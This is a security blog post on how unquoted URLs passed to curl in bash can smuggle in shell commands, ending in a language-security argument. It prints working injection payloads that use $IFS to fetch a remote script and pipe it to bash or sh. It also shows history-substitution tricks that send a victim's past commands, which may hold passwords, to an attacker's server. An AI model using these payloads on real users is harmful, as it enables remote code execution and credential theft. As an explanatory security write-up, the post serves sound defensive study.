Curl, unquoted URLs, and LANGSEC

The other day I had an unpleasant realization about curl, and how I use it. I'm going to guess most programmers have had this experience:

tim@puter:~$ curl -sS
[1] 638
bash: baz: command not found
tim@puter:~$ <!doctype html>
    <title>Example Domain</title>

...and immediately have the reaction "oh dammit I forgot to quote the URL", because that innocuous little ampersand is getting interpreted in bash as "run the preceding as a command in the background".

This has happened to me from time to time for years, but it was only this week that I realized how *dangerous* it is.


(Skip this section if you're experienced in bash.)

Just quickly, I'll explain what's happening there, for anyone who's rusty on bash syntax. The & (ampersand) says "run the preceding command in the background". A little less well-known is that it also works like ; (semicolon) as a command separator, so anything after it on the same line is parsed as a new command. Here's an example of running two commands on the same line using a semicolon to separate them:

tim@puter:~$ echo one; echo two

What if I wanted to run the first echo in the background for some reason? I know I can stick an ampersand on the end of a command to start the process in the background, so I'll try that:

tim@puter:~$ echo one &; echo two
bash: syntax error near unexpected token `;'

Well! Bash doesn't like that any more than if I'd run echo one ;; echo two. It doesn't like the "empty command". Ampersand is like semicolon, except it signals bash to run the command in the background. (Note: I don't pretend to understand why echo one;—ending a line with a semicolon—does not produce the same error.) So let's take another look at that first curl command, and break it apart at the command separators:

curl -sS &

That's "fetch this (shorter) URL in the background and also run baz". Not what we meant at all. The answer is to put double or single quotes around the URL to stop bash from interpreting ampersands as command separators. (And this isn't specific to curl at all; pretty much any shell command is subject to this. I just happen to use curl a lot.)
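To watch the split happen without touching the network, here's a minimal sketch. The URL is made up, and show_arg is a hypothetical stand-in for curl that just reports what it was handed. The eval is only there to make the shell re-parse the text the way it would if you had typed it unquoted at the prompt.

```shell
# Hypothetical URL, for illustration only.
url_text='http://example.com/?foo=1&bar=2&baz=3'

# show_arg is a stand-in for curl: it reports the single argument it received.
show_arg() { printf 'arg: %s\n' "$1"; }

# Unquoted: the shell cuts the line at each & before show_arg ever runs,
# so only the part before the first & reaches it.
unquoted_seen=$(eval "show_arg $url_text"; wait)

# Quoted: the whole URL arrives as one argument.
quoted_seen=$(show_arg "$url_text")

printf 'unquoted -> %s\n' "$unquoted_seen"
printf 'quoted   -> %s\n' "$quoted_seen"
```

The unquoted call only ever sees the URL up to the first ampersand; the rest was handed to the shell as separate commands.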

So what?

It's easy to think of this as an annoyance, but what if instead of baz the last param were delete_all_files? Well... that would suck, but there is no such command. In fact, I can't think of any commands you can run with no arguments as a standard user that have a truly deleterious effect.

Are there any nasty things we can do to someone if we coerce them into curl'ing a provided URL unquoted? Ground rules: Assume the victim is a software developer who has encountered a suspicious-looking URL on the web. They copy the link and use curl to fetch it, but fail to quote the URL. They're using bash. (But we can autodetect their OS since it's the web, and I'm sure PowerShell is just as susceptible to these tricks.)

Let's get dirty

The first step is getting arguments. If we want to run a proof of concept (let's say touch poc) we need some way of producing whitespace. (Why? Check it out: This link has a space in it in the source code, but if you copy the link, that space is encoded as a %20, and so are any quote marks and braces. So literal space chars are out.) The classic here is $IFS, which is a pre-set shell variable that contains a space, a tab, and a newline. It featured recently in a similar takeover exploit for home routers. We'll also need to refer to the target file as ./poc so that bash doesn't think we're referring to a variable called IFSpoc:

tim@puter:~$ curl -sS$IFS./poc
[1] 1328
tim@puter:~$ <!doctype html>
[1]+  Done                    curl -sS
tim@puter:~$ ls poc
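Here's a small sketch of why the ./ matters, assuming nothing beyond a POSIX-ish shell with the default $IFS. count_args is a hypothetical helper that reports how many arguments it received; the eval stands in for typing the text unquoted at a prompt.

```shell
# count_args is a hypothetical helper: it prints the number of arguments it got.
count_args() { echo "$#"; }

# Single quotes keep these as literal text, like characters copied from a link.
with_dot='touch$IFS./poc'
without_dot='touch$IFSpoc'

# eval makes the shell parse the text as if it had been typed unquoted.
n_with_dot=$(eval "count_args $with_dot")        # $IFS expands to whitespace and splits the word
n_without_dot=$(eval "count_args $without_dot")  # the shell looks up a variable named IFSpoc instead

printf '%s -> %s argument(s)\n' "$with_dot" "$n_with_dot"
printf '%s -> %s argument(s)\n' "$without_dot" "$n_without_dot"
```

With the dot, the text splits into a command and its argument; without it, the unset variable IFSpoc expands to nothing and only a bare touch is left.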

Fetching an unquoted URL can reach out and touch your filesystem. I suspect this is game over any way you slice it, but let's keep going. Can we download and run a script immediately? The first problem we run into is that we need to terminate the $IFS variable reference on something that doesn't look like part of a variable name, i.e., not "https". One approach is to call echo inside a command substitution, which expands to an empty string and so provides a short and effective separator between IFS and the URL: curl -sS$IFS$(echo)|bash? (Or as a link.) That fetches a script from my site and pipes it to bash. The script runs a cheeky little animation and then touches /tmp/KHXZNCt2587qvt5-dont-curl-unquoted as a harmless proof of exploit.
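The separator trick can be checked offline with a sketch like this one. The URL and the word fetch are placeholders I've made up, and show_words is a hypothetical helper that prints each argument in brackets; nothing here is downloaded or executed.

```shell
# show_words is a hypothetical helper: it prints each argument on its own line.
show_words() { printf '[%s]\n' "$@"; }

# Literal text, as it would arrive from a copied link (made-up URL).
glued='fetch$IFShttps://example.com/x'
separated='fetch$IFS$(echo)https://example.com/x'

# eval re-parses the text as if typed unquoted at the prompt.
glued_words=$(eval "show_words $glued")          # $IFShttps is read as one (unset) variable
separated_words=$(eval "show_words $separated")  # $(echo) ends the name and expands to nothing

printf 'glued:\n%s\n' "$glued_words"
printf 'separated:\n%s\n' "$separated_words"
```

In the glued case the "https" is swallowed into the variable name and the whole thing collapses to one mangled word; with $(echo) in between, you get the command and the intact URL as two separate words.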


Frankly, that URL is pretty transparently a trick by now. Can we disguise it better?

The curl command allows non-absolute URIs, so we can start the URI with an at-sign (auth section separator, as in instead of a scheme, like so: curl Unfortunately, this defaults to plain http, but an attacker probably doesn't care about that. We can also use a shorter payload URL. I've set up to redirect to my payload, and curl supports the -L/--location option to follow redirects (plus -s to suppress the progress bar). Throw some other gibberish in the URL to make the eye gloss over the shell chars, use sh instead of bash, and we've got something maybe workable: $JH&curl$IFS-sL$IFS@tIMmC.oRG/x|sh&xj!55y!n9x [link]

...well, maybe that's too high-entropy, and devs would reflexively quote it who would not quote a simpler URL. I'm not sure it's a credible threat.

For bonus points, figure out how to produce a plausible stdout, and suppress notifications about background processes terminating.

A few other tricks

Other things that can happen with unquoted URLs:

  • Each query param in a URL has the same syntax as a shell variable assignment; curl'ing has the effect of setting $baz to 3 in the shell. (The other "params" execute in background shell sessions, and the variables do not end up in the main session.) If you found the right shell variable to clobber ($PATH?) I'm sure you could play havoc with someone's environment.
  • curl accepts globbing parameters; placing [1-100] somewhere in the URL would lead to 100 requests for that URL, each with a different number in place of that string. (OK, this one is specific to curl. The similar-looking {1..100} is bash brace expansion instead, which has much the same effect on an unquoted URL.)
  • History substitution works, since the exclamation point ! does not get encoded. You can call up and rerun the most recent command in someone's history that starts with a given string (or, with the !?string? form, contains it). If you ended a malicious URL with &!curl the output of your command would be the output of their last curl command, if the referenced server is still in the same state. This might be a way of camouflaging an attack by confusing the victim.
  • ETA: Bonus trick -- history substitution can also allow exfiltration of commands, even with double quotes. curl -sS "!?@?" expands to include the dev's last command that included a "@" and sends it to your server in the URL query. This character might bring up SSH commands that sloppily include a password, or perhaps similarly a curl command with a --user argument. (How about curl -sS "!?--user?"...) If that history item includes a subshell e.g. echo "it's $(date)" then that subshell is re-executed and the output sent to you.
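The first trick in that list (query params as variable assignments) is easy to reproduce safely. This is a sketch with a made-up URL, using the shell's no-op builtin : as a stand-in for curl, and eval to simulate typing the line unquoted.

```shell
# Start from a clean slate so the result is unambiguous.
unset bar baz

# Hypothetical URL; ':' is the shell's no-op builtin, standing in for curl.
# The shell parses this as three commands:
#   : http://example.com/?foo=1 &     (background)
#   bar=2 &                           (assignment in a background subshell)
#   baz=3                             (assignment in the current shell)
eval ': http://example.com/?foo=1&bar=2&baz=3'
wait

# Only the last assignment survives in the main session.
summary="bar=${bar-<unset>} baz=${baz-<unset>}"
printf '%s\n' "$summary"
```

Only the final parameter lands in the main session, which matches the behavior described in the bullet: the earlier ones are assigned in background subshells and vanish with them.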


So, this all kind of sucks, right? We've had people gleefully reminding us not to paste text from the web into the terminal for the past decade (because it might contain hidden malicious commands rendered invisible with CSS) but we still do it, because it's a serious workflow interruption not to. And it turns out that even when you know what you're pasting, you might not know what you're pasting; if someone disguises one language as another, it can be terrifically difficult to get your brain to switch tracks when reading it. Quoting everything works, except when it doesn't (try echo "!e"), and then you need to single-quote, but single-quotes suck because you can't escape chars inside single-quoted strings, and telling people to do something every single time is a loser's game anyhow and...
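For what it's worth, the usual workaround for the single-quote problem is to close the quote, emit an escaped quote, and reopen. Here's a sketch of that idea; shell_quote is a hypothetical helper of my own naming, not a standard command, and it assumes the input has no trailing newlines (command substitution would strip them).

```shell
# shell_quote is a hypothetical helper, not a standard command.
# It wraps its argument in single quotes and rewrites each embedded
# single quote as '\'' (close quote, escaped quote, reopen quote).
shell_quote() {
    printf "'%s'\n" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Made-up input containing a quote, an ampersand, and a variable reference.
tricky="it's a&b \$IFS"
quoted=$(shell_quote "$tricky")
printf '%s\n' "$quoted"

# Round trip: let the shell parse the quoted form and keep what comes out.
eval "set -- $quoted"
roundtrip=$1
[ "$roundtrip" = "$tricky" ] && echo "round trip ok"
```

It works, but notice how much ceremony it takes to say "this is just data", which is rather the point of the complaint above.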

What it comes down to is that shell language has a terrible interface from a security perspective. You wouldn't write this code, right? query("SELECT * FROM users WHERE userid = " + request.params["id"]) You'd use parameterized SQL instead. You wouldn't drop user data directly into HTML, right? You'd use an encode-by-default, context-aware HTML templating library instead, so that XSS holes can't happen. (Hahahahahahahaha right, no, the industry hasn't learned this one yet.) What these have in common is that naïve string concatenation allows an attacker to control the syntax of your code. It's a level violation -- data and code should be handled differently, and data should never be interpreted automatically as code.
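The same level violation can be shown in shell itself. This is only a sketch with made-up input: the first call splices data into program text (the shell equivalent of the concatenated SQL query), while the second keeps the program text fixed and passes the data separately as a positional parameter, roughly the shell's closest analogue to a parameterized query.

```shell
# Hypothetical hostile input; imagine it arrived from a URL or a web form.
data='hello; echo INJECTED'

# Concatenation: the data is spliced into the program text, so its
# semicolon becomes a command separator in the child shell.
unsafe_out=$(sh -c "printf '%s\n' $data")

# Parameter passing: the program text is fixed, and the data travels
# separately as $1 (the "_" just fills the $0 slot).
safe_out=$(sh -c 'printf "%s\n" "$1"' _ "$data")

printf 'concatenated:\n%s\n' "$unsafe_out"
printf 'parameterized:\n%s\n' "$safe_out"
```

In the concatenated version the attacker's echo actually runs; in the parameterized one the semicolon is just a character in a string.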

But then why in the name of Cthulhu would you use a programming environment that encourages you to paste random data into an environment that has instant access to all your files and software? An environment with a string-concatenation-based language with arcane and irritating quoting rules?

I'll leave you to ponder this.
